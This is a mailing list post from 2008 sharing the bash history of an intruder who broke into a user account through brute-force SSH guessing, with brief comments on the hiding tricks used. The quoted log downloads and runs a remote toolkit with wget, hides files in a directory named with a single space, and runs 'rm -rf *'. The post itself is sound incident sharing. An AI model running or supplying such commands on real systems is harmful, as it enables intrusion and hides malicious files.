[K12OSN] OT: Break-In report

Rob Owens rob.owens at biochemfluidics.com
Wed Jan 2 13:52:58 UTC 2008

I thought you guys might be interested in seeing the tracks of a 
computer break-in.  I won't say whose system it was (to protect the 
embarassed), but the break-in was nothing but a brute-force ssh attempt 
at guessing usernames and passwords.  A regular user account was 
compromised and here is his bash history:

> ls
> cd who
> ls
> exit
> w
> cd /var/tmp
> ls -a
> cd " 
> mkdir " "
> cd " "
> wget quest.dif.jp/x.tgz
> tar zxvf x.tgz
> cd x
> ./start dbdb
> cd ..
> ls -a
> rm -rf *
> passwd
> ls -a
> ps aux
> ps aux | grep dan  (note: the hacked user account was "dan")
> top
> who
> exit

I particularly like the use of " " as a directory name.  Nice and 
invisible.  Also note that the invader put his files in two directories 
which have the "sticky" bit set:  /dev/shm and /var/tmp

In the end, it seems that all the invader succeeded in doing was a bunch 
of port-scanning.  The OS is going to be re-installed anyway, just to be 

Are there any organizations out there that this should be reported to? 
(For instance, the way one might send reports to an antivirus group or a 
content filtering group).


More information about the K12OSN mailing list